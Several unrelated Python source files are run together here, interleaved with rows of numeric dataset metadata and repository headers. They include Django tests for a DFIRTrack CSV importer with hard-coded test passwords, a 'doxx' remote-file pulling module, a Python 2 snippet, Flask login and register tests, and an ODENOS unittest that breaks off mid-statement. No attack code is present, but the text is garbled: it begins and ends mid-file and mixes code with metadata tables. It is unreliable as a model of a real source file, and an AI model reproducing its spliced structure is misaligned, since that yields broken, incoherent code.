self.client.login(username='message_user', password='8LHVC5R5D1bdVBJk56xn')
# get response
response = self.client.get('/system/')
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertEqual(str(response.context['user']), 'message_user')
self.assertEqual(messages[0].message, '[Scheduled task CSV system importer] No read permission for CSV import path. Check config or file system!')
self.assertEqual(messages[0].level_tag, 'error')
def test_system_importer_file_csv_check_content_file_system_instant_path_no_read_permission(self):
""" test importer view """
# change config
set_csv_import_path('/root')
# login testuser
self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
# create url
destination = urllib.parse.quote('/system/', safe='/')
# get response
response = self.client.get('/system/importer/file/csv/instant/', follow=True)
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
self.assertEqual(messages[0].message, 'No read permission for CSV import path. Check config or file system!')
self.assertEqual(messages[0].level_tag, 'error')
""" file not existing """
def test_system_importer_file_csv_check_content_file_system_create_cron_file_not_existing(self):
""" test importer view """
# change config
set_csv_import_path('/tmp')
# change config
set_csv_import_filename('filename_not_existing.abc')
# login testuser
self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
# create url
destination = urllib.parse.quote('/system/', safe='/')
# get response
response = self.client.get('/system/importer/file/csv/cron/', follow=True)
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
self.assertEqual(messages[0].message, 'CSV import file does not exist. Check config or provide file!')
self.assertEqual(messages[0].level_tag, 'error')
def test_system_importer_file_csv_check_content_file_system_cron_file_not_existing(self):
""" test importer view """
# change config
set_csv_import_path('/tmp')
# change config
set_csv_import_filename('filename_not_existing.abc')
# execute cron job / scheduled task
system_cron()
# login testuser
self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
# get response
response = self.client.get('/system/')
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertEqual(str(response.context['user']), 'testuser_system_importer_file_csv_check_content_file_system')
self.assertEqual(messages[0].message, '[Scheduled task CSV system importer] CSV import file does not exist. Check config or provide file!')
self.assertEqual(messages[0].level_tag, 'error')
# switch user context
self.client.logout()
self.client.login(username='message_user', password='8LHVC5R5D1bdVBJk56xn')
# get response
response = self.client.get('/system/')
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertEqual(str(response.context['user']), 'message_user')
self.assertEqual(messages[0].message, '[Scheduled task CSV system importer] CSV import file does not exist. Check config or provide file!')
self.assertEqual(messages[0].level_tag, 'error')
def test_system_importer_file_csv_check_content_file_system_instant_file_not_existing(self):
""" test importer view """
# change config
set_csv_import_path('/tmp')
# change config
set_csv_import_filename('filename_not_existing.abc')
# login testuser
self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
# create url
destination = urllib.parse.quote('/system/', safe='/')
# get response
response = self.client.get('/system/importer/file/csv/instant/', follow=True)
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
self.assertEqual(messages[0].message, 'CSV import file does not exist. Check config or provide file!')
self.assertEqual(messages[0].level_tag, 'error')
""" file no read permission """
def test_system_importer_file_csv_check_content_file_system_create_cron_file_no_read_permission(self):
""" test importer view """
# get timestamp string
t1 = timezone.now().strftime('%Y%m%d_%H%M%S')
# set file system attributes
csv_import_path = '/tmp'
csv_import_filename = f'{t1}_create_cron_no_read_permission.csv'
# create file
create_file_no_read_permission(csv_import_path, csv_import_filename)
# change config
set_csv_import_path(csv_import_path)
# change config
set_csv_import_filename(csv_import_filename)
# login testuser
self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
# create url
destination = urllib.parse.quote('/system/', safe='/')
# get response
response = self.client.get('/system/importer/file/csv/cron/', follow=True)
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
self.assertEqual(messages[0].message, 'No read permission for CSV import file. Check config or file system!')
self.assertEqual(messages[0].level_tag, 'error')
def test_system_importer_file_csv_check_content_file_system_cron_file_no_read_permission(self):
""" test importer view """
# get timestamp string
t1 = timezone.now().strftime('%Y%m%d_%H%M%S')
# set file system attributes
csv_import_path = '/tmp'
csv_import_filename = f'{t1}_cron_no_read_permission.csv'
# create file
create_file_no_read_permission(csv_import_path, csv_import_filename)
# change config
set_csv_import_path(csv_import_path)
# change config
set_csv_import_filename(csv_import_filename)
# execute cron job / scheduled task
system_cron()
# login testuser
self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
# get response
response = self.client.get('/system/')
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertEqual(str(response.context['user']), 'testuser_system_importer_file_csv_check_content_file_system')
self.assertEqual(messages[0].message, '[Scheduled task CSV system importer] No read permission for CSV import file. Check config or file system!')
self.assertEqual(messages[0].level_tag, 'error')
# switch user context
self.client.logout()
self.client.login(username='message_user', password='8LHVC5R5D1bdVBJk56xn')
# get response
response = self.client.get('/system/')
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertEqual(str(response.context['user']), 'message_user')
self.assertEqual(messages[0].message, '[Scheduled task CSV system importer] No read permission for CSV import file. Check config or file system!')
self.assertEqual(messages[0].level_tag, 'error')
def test_system_importer_file_csv_check_content_file_system_instant_file_no_read_permission(self):
""" test importer view """
# get timestamp string
t1 = timezone.now().strftime('%Y%m%d_%H%M%S')
# set file system attributes
csv_import_path = '/tmp'
csv_import_filename = f'{t1}_instant_no_read_permission.csv'
# create file
create_file_no_read_permission(csv_import_path, csv_import_filename)
# change config
set_csv_import_path(csv_import_path)
# change config
set_csv_import_filename(csv_import_filename)
# login testuser
self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
# create url
destination = urllib.parse.quote('/system/', safe='/')
# get response
response = self.client.get('/system/importer/file/csv/instant/', follow=True)
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
self.assertEqual(messages[0].message, 'No read permission for CSV import file. Check config or file system!')
self.assertEqual(messages[0].level_tag, 'error')
""" file empty """
def test_system_importer_file_csv_check_content_file_system_create_cron_file_empty(self):
""" test importer view """
# change config
set_csv_import_path(os.path.join(BASE_DIR, 'dfirtrack_main/tests/system_importer/system_importer_file_csv_files/'))
# change config
set_csv_import_filename('system_importer_file_csv_testfile_06_empty.csv')
# login testuser
self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
# create url
destination = urllib.parse.quote('/system/', safe='/')
# get response
response = self.client.get('/system/importer/file/csv/cron/', follow=True)
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
self.assertEqual(messages[0].message, 'CSV import file is empty. Check config or file system!')
self.assertEqual(messages[0].level_tag, 'error')
def test_system_importer_file_csv_check_content_file_system_cron_file_empty(self):
""" test importer view """
# change config
set_csv_import_path(os.path.join(BASE_DIR, 'dfirtrack_main/tests/system_importer/system_importer_file_csv_files/'))
# change config
set_csv_import_filename('system_importer_file_csv_testfile_06_empty.csv')
# execute cron job / scheduled task
system_cron()
# login testuser
self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
# get response
response = self.client.get('/system/')
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertEqual(str(response.context['user']), 'testuser_system_importer_file_csv_check_content_file_system')
self.assertEqual(messages[0].message, '[Scheduled task CSV system importer] CSV import file is empty. Check config or file system!')
self.assertEqual(messages[0].level_tag, 'error')
# switch user context
self.client.logout()
self.client.login(username='message_user', password='8LHVC5R5D1bdVBJk56xn')
# get response
response = self.client.get('/system/')
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertEqual(str(response.context['user']), 'message_user')
self.assertEqual(messages[0].message, '[Scheduled task CSV system importer] CSV import file is empty. Check config or file system!')
self.assertEqual(messages[0].level_tag, 'error')
def test_system_importer_file_csv_check_content_file_system_instant_file_empty(self):
""" test importer view """
# change config
set_csv_import_path(os.path.join(BASE_DIR, 'dfirtrack_main/tests/system_importer/system_importer_file_csv_files/'))
# change config
set_csv_import_filename('system_importer_file_csv_testfile_06_empty.csv')
# login testuser
self.client.login(username='testuser_system_importer_file_csv_check_content_file_system', password='mxsdGwJ2TINdQMq6rMNN')
# create url
destination = urllib.parse.quote('/system/', safe='/')
# get response
response = self.client.get('/system/importer/file/csv/instant/', follow=True)
# get messages
messages = list(get_messages(response.wsgi_request))
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
self.assertEqual(messages[0].message, 'CSV import file is empty. Check config or file system!')
self.assertEqual(messages[0].level_tag, 'error')
| 47.276102
| 154
| 0.699352
| 2,461
| 20,376
| 5.509955
| 0.0577
| 0.047124
| 0.059735
| 0.08208
| 0.942847
| 0.932153
| 0.932153
| 0.929056
| 0.928761
| 0.928761
| 0
| 0.011327
| 0.202739
| 20,376
| 430
| 155
| 47.386047
| 0.823392
| 0.114596
| 0
| 0.812207
| 0
| 0.018779
| 0.272825
| 0.120337
| 0
| 0
| 0
| 0
| 0.28169
| 1
| 0.079812
| false
| 0.103286
| 0.525822
| 0
| 0.615023
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 10
|
0482fcfc2f6bb3c65e8da083cd19ff380676c1a8
| 12,161
|
py
|
Python
|
lib/doxx/datatypes/remotefiles.py
|
joesantana/doxx
|
08b89597792ce6c9e795c8bb11001a3a69c1f22c
|
[
"MIT"
] | null | null | null |
lib/doxx/datatypes/remotefiles.py
|
joesantana/doxx
|
08b89597792ce6c9e795c8bb11001a3a69c1f22c
|
[
"MIT"
] | null | null | null |
lib/doxx/datatypes/remotefiles.py
|
joesantana/doxx
|
08b89597792ce6c9e795c8bb11001a3a69c1f22c
|
[
"MIT"
] | 1
|
2021-07-17T22:59:12.000Z
|
2021-07-17T22:59:12.000Z
|
#!/usr/bin/env python
# encoding: utf-8
from os import remove
import os.path
from multiprocessing import Process, Lock
from Naked.toolshed.system import stderr, stdout, file_exists
from doxx.commands.pull import pull_binary_file, pull_text_file
from doxx.commands.unpack import unpack_run
from doxx.utilities.filesystem import _create_dirs, _make_os_dependent_path
########################################
#
# [pull_textfile_runner]
# public function
# - pull remote text files
#
########################################
def pull_textfile_runner(text_url_dict):
"""pulls remote text files to local filesystem (public function)"""
file_list = list(text_url_dict) # the local outfile names in a list
number_of_files = len(file_list) # the number of files included in the list
if number_of_files > 0:
if number_of_files > 1: # multiple text file pull, each in separate process
processes = [] # list of spawned processes
outputlock = Lock() # stdout / stderr writes lock
iolock = Lock() # input/output lock
# iterate through requested files and execute pull in separate process for each one
for file_path in file_list:
p = Process(target=_pull_textfile_multiprocess, args=(file_path, text_url_dict[file_path], outputlock, iolock))
p.start()
processes.append(p)
for process in processes:
process.join(timeout=60)
else: # single text file pull
file_path = file_list[0]
_pull_textfile(file_path, text_url_dict[file_path]) # file_path is local path for write, dictionary value is the URL
else:
stderr("[!] doxx: Unable to find text files to pull in the key file", exit=0)
########################################
#
# [pull_binaryfile_runner]
# public function
# - pull remote binary files
#
########################################
def pull_binaryfile_runner(binary_url_dict):
"""pulls remote binary files to local filesystem (public function)"""
file_list = list(binary_url_dict) # the local outfile names in a list
number_of_files = len(file_list) # the number of files included in the list
if number_of_files > 0:
if number_of_files > 1: # multiple binary file pull, each in separate process
processes = [] # list of spawned processes
outputlock = Lock() # stdout / stderr writes lock
iolock = Lock() # input/output lock
# iterate through requested files and execute pull in separate process for each one
for file_path in file_list:
p = Process(target=_pull_binaryfile_multiprocess, args=(file_path, binary_url_dict[file_path], outputlock, iolock))
p.start()
processes.append(p)
for process in processes:
process.join(timeout=60)
else: # single text file pull
file_path = file_list[0]
_pull_binaryfile(file_path, binary_url_dict[file_path]) # file_path is local path for write, dictionary value is the URL
else:
stderr("[!] doxx: Unable to find binary files to pull in the key file", exit=0)
###########################################
#
# [pull_github_repo_runner]
# public function
# - pull remote Github repo archives
#
###########################################
def pull_github_repo_runner(repo_url_dict):
"""pulls remote Github repository archives to the local filesystem and unpacks (public function)"""
file_list = list(repo_url_dict) # the local outfile names in a list
number_of_files = len(file_list) # the number of files included in the list
if number_of_files > 0:
if number_of_files > 1: # multiple binary file pull, each in separate process
stdout("[*] doxx: Hang in there. Pulling " + str(number_of_files) + " entire repositories. This may take a bit of time...")
processes = [] # list of spawned processes
outputlock = Lock() # stdout / stderr writes lock
iolock = Lock() # input/output lock
# iterate through requested files and execute pull in separate process for each one
for file_path in file_list:
p = Process(target=_pull_github_repo_multiprocess, args=(file_path, repo_url_dict[file_path], outputlock, iolock))
p.start()
processes.append(p)
for process in processes:
process.join(timeout=120)
else: # single text file pull
stdout("[*] doxx: Hang in there. Pulling an entire repository. This may take a bit of time...")
file_path = file_list[0]
_pull_github_repo(file_path, repo_url_dict[file_path]) # file_path is local path for write, dictionary value is the URL
else:
stderr("[!] doxx: Unable to find binary files to pull in the key file", exit=0)
###############################################
#
# [_pull_textfile]
# private function
# - execute single process text file pulls
#
###############################################
def _pull_textfile(file_path, url):
"""executes single process text file pulls (private function)"""
# create OS dependent file path (if necessary)
file_path = _make_os_dependent_path(file_path)
# make directory structure if necessary for the file path
if os.path.dirname(file_path) is not "":
_create_dirs(file_path)
# pull the file and write to local filesystem
try:
pull_text_file(url, file_path)
except Exception as e:
stderr("[!] doxx: Unable to pull '" + file_path + "' from '" + url + "'. Error: " + str(e), exit=1)
if file_exists(file_path):
stdout("[+] doxx: '" + file_path + "' ...check!")
else:
stderr("[!] doxx: There was an error pulling '" + file_path + "'. Error: Unable to locate local file.", exit=1)
########################################
#
# [_pull_textfile_multiprocess]
# private function
# - execute multi-file, multiprocess
# text file pulls
#
########################################
def _pull_textfile_multiprocess(file_path, url, outputlock, iolock):
"""executes multiprocess, multi-file text file pulls (private function)"""
# create OS dependent file path (if necessary)
file_path = _make_os_dependent_path(file_path)
# make directory structure if necessary for the file path
if os.path.dirname(file_path) is not "":
iolock.acquire()
_create_dirs(file_path)
iolock.release()
# pull the file and write to local filesystem
try:
pull_text_file(url, file_path)
except Exception as e:
outputlock.acquire()
stderr("[!] doxx: Unable to pull '" + file_path + "' from '" + url + "'. Error: " + str(e), exit=0)
outputlock.release()
if file_exists(file_path):
outputlock.acquire()
stdout("[+] doxx: '" + file_path + "' ...check!")
outputlock.release()
else:
outputlock.acquire()
stderr("[!] doxx: There was an error pulling '" + file_path + "'. Error: Unable to locate local file", exit=0)
outputlock.release()
########################################
#
# [_pull_binaryfile]
# private function
# - execute single process binary
# file pulls
#
########################################
def _pull_binaryfile(file_path, url):
"""executes single process binary file pulls (private function)"""
# create OS dependent file path (if necessary)
file_path = _make_os_dependent_path(file_path)
# make directory structure if necessary for the file path
if os.path.dirname(file_path) is not "":
_create_dirs(file_path)
# pull the file and write to local filesystem
try:
pull_binary_file(url, file_path)
except Exception as e:
stderr("[!] doxx: Unable to pull '" + file_path + "' from '" + url + "'. Error: " + str(e), exit=0)
if file_exists(file_path):
stdout("[+] doxx: '" + file_path + "' ...check!")
else:
stderr("[!] doxx: There was an error pulling '" + file_path + "'. Error: Unable to locate local file.", exit=1)
########################################
#
# [_pull_binaryfile_multiprocess]
# private function
# - execute multiprocess multi-file
# binary file pulls
#
########################################
def _pull_binaryfile_multiprocess(file_path, url, outputlock, iolock):
# create OS dependent file path (if necessary)
file_path = _make_os_dependent_path(file_path)
# make directory structure if necessary for the file path
if os.path.dirname(file_path) is not "":
iolock.acquire()
_create_dirs(file_path)
iolock.release()
# pull the file and write to local filesystem
try:
pull_binary_file(url, file_path)
except Exception as e:
outputlock.acquire()
stderr("[!] doxx: Unable to pull '" + file_path + "' from '" + url + "'. Error: " + str(e), exit=0)
outputlock.release()
if file_exists(file_path):
outputlock.acquire()
stdout("[+] doxx: '" + file_path + "' ...check!")
outputlock.release()
else:
outputlock.acquire()
stderr("[!] doxx: There was an error pulling '" + file_path + "'. Error: Unable to locate local file", exit=0)
outputlock.release()
########################################
#
# [_pull_github_repo]
# private function
# - execute single process Github
# repository archive pulls
#
########################################
def _pull_github_repo(file_path, url):
"""executes single process Github repository archive pulls (private function)"""
# create OS dependent file path (if necessary)
file_path = _make_os_dependent_path(file_path)
# make directory structure if necessary for the file path
if os.path.dirname(file_path) is not "":
_create_dirs(file_path)
# pull the file and write to local filesystem
try:
pull_binary_file(url, file_path)
except Exception as e:
stderr("[!] doxx: Unable to pull the archive file from the URL '" + url + "'. Error: " + str(e), exit=0)
if file_exists(file_path):
root_dir = unpack_run(file_path)
remove(file_path)
stdout("[+] doxx: '" + root_dir + "' ...check!")
else:
stderr("[!] doxx: There was an error pulling the repository file. Error: Unable to locate local archive file.", exit=1)
########################################
#
# [_pull_github_repo_multiprocess]
# private function
# - execute multiprocess multi-file
# Github repo archive pulls
#
########################################
def _pull_github_repo_multiprocess(file_path, url, outputlock, iolock):
# create OS dependent file path (if necessary)
file_path = _make_os_dependent_path(file_path)
# make directory structure if necessary for the file path
if os.path.dirname(file_path) is not "":
iolock.acquire()
_create_dirs(file_path)
iolock.release()
# pull the file and write to local filesystem
try:
pull_binary_file(url, file_path)
except Exception as e:
outputlock.acquire()
stderr("[!] doxx: Unable to pull the archive file from the URL '" + url + "'. Error: " + str(e), exit=0)
outputlock.release()
if file_exists(file_path):
root_dir = unpack_run(file_path)
remove(file_path)
outputlock.acquire()
stdout("[+] doxx: '" + root_dir + "' ...check!")
outputlock.release()
else:
outputlock.acquire()
stderr("[!] doxx: There was an error pulling the repository file. Error: Unable to locate local archive file.", exit=1)
outputlock.release()
| 38.853035
| 135
| 0.593537
| 1,453
| 12,161
| 4.780454
| 0.094288
| 0.104809
| 0.024331
| 0.023323
| 0.869421
| 0.83055
| 0.763029
| 0.730204
| 0.730204
| 0.715088
| 0
| 0.003549
| 0.258531
| 12,161
| 312
| 136
| 38.977564
| 0.766774
| 0.2832
| 0
| 0.819277
| 0
| 0.012048
| 0.165158
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054217
| false
| 0
| 0.042169
| 0
| 0.096386
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
04c8ea116a425456d39a39007eeb07e8a31e03fb
| 80
|
py
|
Python
|
20160213_1.py
|
JaeGyu/PythonEx_1
|
e67053db6ca7431c3dd66351c190c53229e3f141
|
[
"MIT"
] | null | null | null |
20160213_1.py
|
JaeGyu/PythonEx_1
|
e67053db6ca7431c3dd66351c190c53229e3f141
|
[
"MIT"
] | null | null | null |
20160213_1.py
|
JaeGyu/PythonEx_1
|
e67053db6ca7431c3dd66351c190c53229e3f141
|
[
"MIT"
] | null | null | null |
#-*- coding: utf-8 -*-
import mod1
print mod1.sum(1,2)
print mod1.safe_sum(1,2)
| 16
| 24
| 0.6625
| 16
| 80
| 3.25
| 0.625
| 0.346154
| 0.192308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 0.125
| 80
| 5
| 24
| 16
| 0.628571
| 0.2625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.333333
| null | null | 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
8e0b5ca50f31b4ce5353ce85b331c3391e804040
| 5,489
|
py
|
Python
|
tests/endpoints/test_auth_endpoints.py
|
Elias-Wilde/my-projekt
|
74993684aaf9806fa20d67dc83fd103cff492b2a
|
[
"MIT"
] | null | null | null |
tests/endpoints/test_auth_endpoints.py
|
Elias-Wilde/my-projekt
|
74993684aaf9806fa20d67dc83fd103cff492b2a
|
[
"MIT"
] | null | null | null |
tests/endpoints/test_auth_endpoints.py
|
Elias-Wilde/my-projekt
|
74993684aaf9806fa20d67dc83fd103cff492b2a
|
[
"MIT"
] | null | null | null |
def test_register_get(client, captured_templates):
"""
GIVEN a Flask application configured for testing (client)
WHEN the '/' route is requested (GET)
THEN there should be the correct `status_code`, `template.name`,
and the correct `page_title` in the context
"""
# mimic a browser: 'GET /', as if you visit the site
response = client.get("/register")
# check that the HTTP response is a success
assert response.status_code == 200
# check that the rendered template is the correct one
assert len(captured_templates) == 1
template, context = captured_templates[0]
assert template.name == "register.html"
assert "page_title" in context
assert context["page_title"] == "Register"
def test_valid_register_post(client, captured_templates, test_db):
"""
GIVEN a Flask application configured for testing (client), the test db
WHEN a user wants to register and posts valid data to '/register' (POST)
THEN the user should be registered to the db, logged in, and
redirected to the landing page.
"""
# mimic a browser: 'POST /register', as if you visit the site
response = client.post(
"/register",
data=dict(
username="28kadsen",
email_address="28kadsen@gmail.com",
password1="123456",
password2="123456",
),
follow_redirects=True,
)
# check that the HTTP response fail
assert response.status_code == 200
# check that the rendered template is the correct one
assert len(captured_templates) == 1
template, context = captured_templates[0]
assert template.name == "landing_page.html"
assert "page_title" in context
assert context["page_title"] == "Help & Help"
html_content = response.data.decode()
assert '<a class="nav-link" href="#">Welcome, 28kadsen</a>' in html_content
def test_invalid_register_post(client, captured_templates, test_db):
"""
GIVEN a Flask application configured for testing (client) and the test db
WHEN a user wants to register and posts invalid data to '/register' (POST)
THEN the user should NOT be registered to the db, html contain error messages.
"""
# mimic a browser: 'POST /register', as if you visit the site
response = client.post(
"/register",
data=dict(
username="gottheit",
email_address="28kadsengmail.com",
password1="44444",
password2="55555",
),
follow_redirects=True,
)
# check that the HTTP response is a success
assert response.status_code == 400
# check that the rendered template is the correct one
assert len(captured_templates) == 1
template, context = captured_templates[0]
assert template.name == "register.html"
assert "page_title" in context
assert context["page_title"] == "Register"
html_content = response.data.decode()
assert "Invalid email address." in html_content
assert "Field must be equal to password1." in html_content
def test_login_get(client, captured_templates):
"""
GIVEN a Flask application configured for testing (client)
WHEN the '/login' route is requested (GET)
THEN there should be the correct `status_code`, `template.name`,
and the correct `page_title` in the context
"""
# mimic a browser: 'GET /', as if you visit the site
response = client.get("/login")
# check that the HTTP response is a success
assert response.status_code == 200
# check that the rendered template is the correct one
assert len(captured_templates) == 1
template, context = captured_templates[0]
assert template.name == "login.html"
assert "page_title" in context
assert context["page_title"] == "Login"
def test_login_post(client, captured_templates, fake_user):
"""
GIVEN a Flask application configured for testing (client) and the fake_user
WHEN the fake_user data is posted
THEN then the fake_user should be logged in and redirected to the landing page
"""
# mimic a browser: 'POST /', as if you visit the site
response = client.post(
"/login",
data=dict(username=fake_user.username, password="123456"),
follow_redirects=True,
)
# check that the HTTP response is a success
assert response.status_code == 200
# check that the rendered template is the correct one
assert len(captured_templates) == 1
template, context = captured_templates[0]
assert template.name == "landing_page.html"
assert "page_title" in context
assert context["page_title"] == "Help & Help"
def test_logout(client, captured_templates):
"""
GIVEN a Flask application configured for testing (client)
WHEN the '/logout' route is requested (GET)
THEN the user should be logged out and
there should be the correct `status_code`, `template.name`,
and the correct `page_title` in the context
"""
# mimic a browser: 'GET /', as if you visit the site
response = client.get("/logout", follow_redirects=True)
# check that the HTTP response is a success
assert response.status_code == 200
# check that the rendered template is the correct one
assert len(captured_templates) == 1
template, context = captured_templates[0]
assert template.name == "login.html"
assert "page_title" in context
assert context["page_title"] == "Login"
| 29.831522
| 82
| 0.674075
| 722
| 5,489
| 5.020776
| 0.146814
| 0.084414
| 0.039724
| 0.036414
| 0.857655
| 0.825655
| 0.806345
| 0.806345
| 0.787034
| 0.761655
| 0
| 0.016973
| 0.23793
| 5,489
| 183
| 83
| 29.994536
| 0.849629
| 0.404263
| 0
| 0.653333
| 0
| 0
| 0.154493
| 0
| 0
| 0
| 0
| 0
| 0.44
| 1
| 0.08
| false
| 0.08
| 0
| 0
| 0.08
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
8e4dbb435e98d67b6bdc98e969abb443f9268267
| 17,717
|
py
|
Python
|
src/test/python/org/o3project/odenos/core/util/test_remote_object_interface.py
|
o3project/odenos
|
837d0d3d3c37482e843c40c5eeeac10646e68c65
|
[
"Apache-2.0"
] | 26
|
2015-02-18T10:22:50.000Z
|
2020-06-18T05:07:54.000Z
|
src/test/python/org/o3project/odenos/core/util/test_remote_object_interface.py
|
o3project/odenos
|
837d0d3d3c37482e843c40c5eeeac10646e68c65
|
[
"Apache-2.0"
] | 45
|
2015-02-20T00:40:45.000Z
|
2021-12-14T21:07:57.000Z
|
src/test/python/org/o3project/odenos/core/util/test_remote_object_interface.py
|
o3project/odenos
|
837d0d3d3c37482e843c40c5eeeac10646e68c65
|
[
"Apache-2.0"
] | 30
|
2015-02-19T02:00:35.000Z
|
2017-02-18T15:28:09.000Z
|
# -*- coding:utf-8 -*-
# Copyright 2015 NEC Corporation. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
from org.o3project.odenos.core.util.remote_object_interface import (
RemoteObjectInterface)
from org.o3project.odenos.remoteobject.message.request import Request
from org.o3project.odenos.remoteobject.message.response import Response
import unittest
from mock import Mock, patch
from contextlib import nested
class RemoteObjectInterfaceTest(unittest.TestCase):
def setUp(self):
self.Disppatcher = Mock()
self.object_id = "ObjectId"
self.txid = "*"
self.target = RemoteObjectInterface(self.Disppatcher,
self.object_id)
def tearDown(self):
self.target = None
def test_constructor(self):
self.assertEqual(self.target._RemoteObjectInterface__dispatcher,
self.Disppatcher)
self.assertEqual(self.target._RemoteObjectInterface__object_id,
self.object_id)
def test_object_id(self):
self.assertEqual(self.target.object_id,
self.object_id)
def test_get_property_success(self):
value = "propertyBody"
with patch('org.o3project.odenos.core.util.remote_object_interface.'
'RemoteObjectInterface._get_object_to_remote_object',
return_value=Response(Response.StatusCode.OK, value)
) as m_get_object:
self.result = self.target.get_property()
self.assertEqual(m_get_object.call_count, 1)
self.assertEqual(m_get_object.call_args[0][0],
RemoteObjectInterface.PROPETY_PATH)
self.assertNotEqual(self.result, None)
def test_get_property_StatusCode_NotOK(self):
value = "propertyBody"
with patch('org.o3project.odenos.core.util.remote_object_interface.'
'RemoteObjectInterface._get_object_to_remote_object',
return_value=Response(Response.StatusCode.NOT_FOUND,
value)
) as m_get_object:
self.result = self.target.get_property()
self.assertEqual(m_get_object.call_count, 1)
self.assertEqual(m_get_object.call_args[0][0],
RemoteObjectInterface.PROPETY_PATH)
self.assertEqual(self.result, None)
def test_get_settings_success(self):
value = "settingsBody"
with patch('org.o3project.odenos.core.util.remote_object_interface.'
'RemoteObjectInterface._get_object_to_remote_object',
return_value=Response(Response.StatusCode.OK, value)
) as m_get_object:
self.result = self.target.get_settings()
self.assertEqual(m_get_object.call_count, 1)
self.assertEqual(m_get_object.call_args[0][0],
RemoteObjectInterface.SETTINGS_PATH)
self.assertNotEqual(self.result, None)
def test_get_settings_StatusCode_NotOK(self):
value = "settingsBody"
with patch('org.o3project.odenos.core.util.remote_object_interface.'
'RemoteObjectInterface._get_object_to_remote_object',
return_value=Response(Response.StatusCode.NOT_FOUND,
value)
) as m_get_object:
self.result = self.target.get_settings()
self.assertEqual(m_get_object.call_count, 1)
self.assertEqual(m_get_object.call_args[0][0],
RemoteObjectInterface.SETTINGS_PATH)
self.assertEqual(self.result, None)
def test_put_property_success(self):
value = "propertyBody"
with patch('org.o3project.odenos.core.util.remote_object_interface.'
'RemoteObjectInterface._put_object_to_remote_object'
) as m_put_object:
self.result = self.target.put_property(value)
self.assertEqual(m_put_object.call_count, 1)
m_put_object.assert_any_call(
RemoteObjectInterface.PROPETY_PATH, value)
self.assertNotEqual(self.result, None)
def test_put_setting_success(self):
Path = RemoteObjectInterface.SETTINGS_PATH
value = "settingsBody"
with patch('org.o3project.odenos.core.util.remote_object_interface.'
'RemoteObjectInterface._put_object_to_remote_object'
) as m_put_object:
self.result = self.target.put_settings(value)
self.assertEqual(m_put_object.call_count, 1)
m_put_object.assert_any_call(Path, value)
self.assertNotEqual(self.result, None)
def test__post_object_to_remote_object_success(self):
Path = RemoteObjectInterface.PROPETY_PATH
method = Request.Method.POST
_object_id = self.object_id
value = "propertyBody"
with nested(
patch('org.o3project.odenos.core.util.remote_object_interface.'
'RemoteObjectInterface.'
'_RemoteObjectInterface__send_request',
